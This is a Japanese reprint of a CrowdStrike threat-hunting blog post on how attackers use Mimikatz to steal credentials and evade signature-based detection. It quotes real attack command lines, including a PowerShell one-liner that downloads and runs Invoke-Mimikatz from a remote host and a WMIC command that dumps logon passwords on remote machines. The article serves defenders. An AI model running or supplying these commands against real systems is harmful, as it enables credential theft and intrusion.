CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避 | ScanNetSecurity
2021.10.23(土)
コンテンツ
注目検索ワード
ホーム 国際 海外情報 記事

CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避

今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。

国際 海外情報
 今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。中にはシグネチャベースの検知を回避するためにMimikatzが使われた珍しいケースもあります。

 OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。

権限昇格に使用する認証情報へのアクセス

 悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています(認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています)。

Mimikatzの手法

 認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者(CTO)のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト(侵入テスト)のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。

実行ファイル名の変更

 Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。

c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""

 これにより攻撃者は、システム上の認証情報にアクセスできるようになります。

バッチファイルの使用

 Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。

PowerShellの亜種を使用

 OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'

コマンドラインオプションの変更

 2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。

mnl.exe pr::dg sl::lp et -p

 このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。

Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"

IOAの監視が必須

 これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。

 ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡(IOC)に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡(IOA)を監視することの重要性が、さらに明らかになっています。

その他のリソース

「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください

「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください

・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください

*原文はCrowdStrike Blog サイト掲載 :https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/
《Harlan Carvey (CrowdStrike)》

ソース・関連リンク

関連記事

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

脆弱性と脅威 記事一覧へ

複数のOracle製品のクリティカルパッチアップデートについて注意喚起、Java SEの脆弱性は攻撃時の影響大 画像

複数のOracle製品のクリティカルパッチアップデートについて注意喚起、Java SEの脆弱性は攻撃時の影響大
Movable Type の XMLRPC API に OS コマンドインジェクションの脆弱性、攻撃時の影響大 画像

Movable Type の XMLRPC API に OS コマンドインジェクションの脆弱性、攻撃時の影響大
JP1/IT Desktop Management 2, JP1/NETM/DM, JP1/Remote Control, Hitachi IT Operations Director 製品に複数の脆弱性 画像

JP1/IT Desktop Management 2, JP1/NETM/DM, JP1/Remote Control, Hitachi IT Operations Director 製品に複数の脆弱性
128 Technology Session Smart Router に認証不備の脆弱性 画像

128 Technology Session Smart Router に認証不備の脆弱性
中国海軍艦艇とロシア海軍艦艇が同時に津軽海峡を通過 画像

中国海軍艦艇とロシア海軍艦艇が同時に津軽海峡を通過
Xserver をかたるフィッシングに注意喚起、10/18時点でサイト稼働中 画像

Xserver をかたるフィッシングに注意喚起、10/18時点でサイト稼働中

インシデント・事故 記事一覧へ

ペット用品取扱い「アルファアイコンオフィシャルショップサイト」に不正アクセス、1週間で発覚 画像

ペット用品取扱い「アルファアイコンオフィシャルショップサイト」に不正アクセス、1週間で発覚
ワイヤー錠で固定実施済も、病院の超音波診断装置外付けHDD行方知れず 画像

ワイヤー錠で固定実施済も、病院の超音波診断装置外付けHDD行方知れず
オリンパス、米州での不正アクセスで一部データ流出の可能性 画像

オリンパス、米州での不正アクセスで一部データ流出の可能性
奈良県明日香村で個人情報が記載された文書を資源ごみに混入、盗難に遭い三重県名張市で投棄散乱 画像

奈良県明日香村で個人情報が記載された文書を資源ごみに混入、盗難に遭い三重県名張市で投棄散乱
株式会社祭の業務委託メンバーが不正アクセス、会計情報を公開 画像

株式会社祭の業務委託メンバーが不正アクセス、会計情報を公開
コックフーズへランサムウェア攻撃、業務データの多くが暗号化 画像

コックフーズへランサムウェア攻撃、業務データの多くが暗号化

調査・レポート・白書 記事一覧へ

JSSEC「Android アプリのセキュア設計・セキュアコーディングガイド」改定、最新版Android 12に対応 画像

JSSEC「Android アプリのセキュア設計・セキュアコーディングガイド」改定、最新版Android 12に対応
インターネット定点観測システムTSUBAME観測結果公開 画像

インターネット定点観測システムTSUBAME観測結果公開
水道局とパイプライン企業へのサイバー攻撃、制御システムで起こったインシデント2例追加 画像

水道局とパイプライン企業へのサイバー攻撃、制御システムで起こったインシデント2例追加
若手社員の半数以上「情報漏えいより締め切りが大切」IT部門との確執浮き彫り 画像

若手社員の半数以上「情報漏えいより締め切りが大切」IT部門との確執浮き彫り
JPCERT/CC 2021年第3四半期インシデント報告、改ざんされたWebサイトから偽ECサイトへの転送を複数確認 画像

JPCERT/CC 2021年第3四半期インシデント報告、改ざんされたWebサイトから偽ECサイトへの転送を複数確認
教育機関デジタル化実態調査、オンライン学習に潜むサイバー不正行為に警鐘 画像

教育機関デジタル化実態調査、オンライン学習に潜むサイバー不正行為に警鐘

研修・セミナー・カンファレンス 記事一覧へ

「45分でわかるネットワーク/サーバ監視」セキュアヴェイルとキャリアヴェイルがオンラインセミナー開催 画像

「45分でわかるネットワーク/サーバ監視」セキュアヴェイルとキャリアヴェイルがオンラインセミナー開催
発見した攻撃者を泳がせ・妨害し・諦めさせる ~ TEAM T5 の特筆すべき成功例「オペレーション:アイ アム トム」 画像

発見した攻撃者を泳がせ・妨害し・諦めさせる ~ TEAM T5 の特筆すべき成功例「オペレーション:アイ アム トム」
「サイバーセキュリティ・オンラインサミット 2021年(秋)」開催、編集長も講演 画像

「サイバーセキュリティ・オンラインサミット 2021年(秋)」開催、編集長も講演
中台サイバー攻防:中国政府の情報戦に抗う台湾 TEAM T5 画像

中台サイバー攻防:中国政府の情報戦に抗う台湾 TEAM T5
漏えい事故発生 その時企業は何をすべきか ~ 日本・台湾・タイ・EU 規制状況 画像

漏えい事故発生 その時企業は何をすべきか ~ 日本・台湾・タイ・EU 規制状況
非対面時代にハイブリッド開催を行う意味 ~ サイバーセキュリティ会議「CODE BLUE 2021」来週開催 会場参加チケット本日迄 画像

非対面時代にハイブリッド開催を行う意味 ~ サイバーセキュリティ会議「CODE BLUE 2021」来週開催 会場参加チケット本日迄

製品・サービス・業界動向 記事一覧へ

「Apex Legends」DoS攻撃への対策強化 画像

「Apex Legends」DoS攻撃への対策強化
ネット通販の不正注文検知サービス「不正チェッカー」を月額4,000円で提供 画像

ネット通販の不正注文検知サービス「不正チェッカー」を月額4,000円で提供
「日本法人よりも日本法人」ってどういう意味? セキュリティ課題に立ち向かう熱き相棒:後編 画像

「日本法人よりも日本法人」ってどういう意味? セキュリティ課題に立ち向かう熱き相棒:後編
Linux Foundation、OpenSSFを拡大・支援するために1,000万ドルの新規投資を調達 画像

Linux Foundation、OpenSSFを拡大・支援するために1,000万ドルの新規投資を調達
LogStareのSOCの窓 第6回「多機能、次世代、便利なセキュリティ機器の落とし穴」 画像

LogStareのSOCの窓 第6回「多機能、次世代、便利なセキュリティ機器の落とし穴」
知られざる暗号評価プロジェクト CRYPTREC 第1回「三つの会議体」 画像

知られざる暗号評価プロジェクト CRYPTREC 第1回「三つの会議体」

おしらせ 記事一覧へ

創刊23周年記念イベント「ハッカージャーナリスト誕生譚」オンライン公開インタビュー 11/18 開催 画像

創刊23周年記念イベント「ハッカージャーナリスト誕生譚」オンライン公開インタビュー 11/18 開催
Scan PREMIUM 創刊23周年記念キャンペーン実施中 画像

Scan PREMIUM 創刊23周年記念キャンペーン実施中
ScanNetSecurity 創刊23周年御礼の辞(上野宣) 画像

ScanNetSecurity 創刊23周年御礼の辞(上野宣)
セキュリティ業界最強の「ヤバイTシャツ屋」でも売っていないもの ~ 2021年 CrowdStrike カレンダー読者プレゼント 画像

セキュリティ業界最強の「ヤバイTシャツ屋」でも売っていないもの ~ 2021年 CrowdStrike カレンダー読者プレゼント
ScanNetSecurity システム更新のお知らせ 画像

ScanNetSecurity システム更新のお知らせ
特典ノベルティ写真公開、Scan PREMIUM 創刊22周年記念キャンペーン11月末迄 画像

特典ノベルティ写真公開、Scan PREMIUM 創刊22周年記念キャンペーン11月末迄
Page Top
★★10/8~11/30迄 創刊23周年記念価格提供中★★
★★10/8~11/30迄 創刊23周年記念価格提供中★★

2021年10月8日(金)~11月30日(火) の間 ScanNetSecurity 創刊23周年記念価格で提供。
×